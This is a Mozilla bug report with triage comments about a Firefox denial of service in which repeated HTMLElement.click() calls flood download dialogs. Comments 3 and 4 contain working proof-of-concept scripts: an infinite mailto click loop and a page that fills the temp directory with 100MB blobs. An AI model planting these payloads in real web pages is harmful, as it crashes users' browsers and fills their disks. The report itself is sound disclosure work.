1229873 - HTMLElement.click() spam download dialogue (DoS)

Status: NEW

(Firefox :: Downloads Panel, defect)

Description

[Abdulrahman Alqabandi]

User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36

Steps to reproduce:

http://jsfiddle.net/6qdogb1p/



Actual results:

Download dialogues are spammed indefinitely (or until memory runs our ofc)


Expected results:

Some sort of protection to limit download requests to ~5 attempts

Or just fix the .click() function to not be spammed multiple times

tested on FF v42.0 on windows 8.1

Comment 1

[Michelle Funches - QA]

Confirmed
20151029151421
Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0

Comment 2

[Michelle Funches - QA]

Setting to New - Firefox: Download Panel - while I don't think this is the root cause, it is a start to have someone assist me in correctly setting the Product/Component.
Thanks,
Michelle

Comment 3

[Abdulrahman Alqabandi]

P.S. this bug could be used to spam default mail program, might lead to some ugliness.

PoC
<a href='mailto:@qab' id='q'>q</a>
<script>
while(true){q.click()};
</script>

Comment 4

[coffeemakr]

I noticed the same and wanted to append that this can also be used to fill up the temp directory (e.g. with a 100MB blob), because the download starts before confirmation:

<!DOCTYPE html>
<html>
<body>
    <a download="im-a-file.txt" href='#' id="link">Download</a>
    <div id="counter">0</div>
    <script>
        value = "-".repeat(1024 * 1024)
        let blob = new Blob(Array(100).fill(value), { type: 'text/plain' });
        let link = document.getElementById('link');
        link.href = URL.createObjectURL(blob);
        window.setInterval(function () {
            link.click();
            document.getElementById("counter").textContent++;
        }, 100)
    </script>
</body>
</html>

Comment 5

[coffeemakr]

Attachment: download-popups.html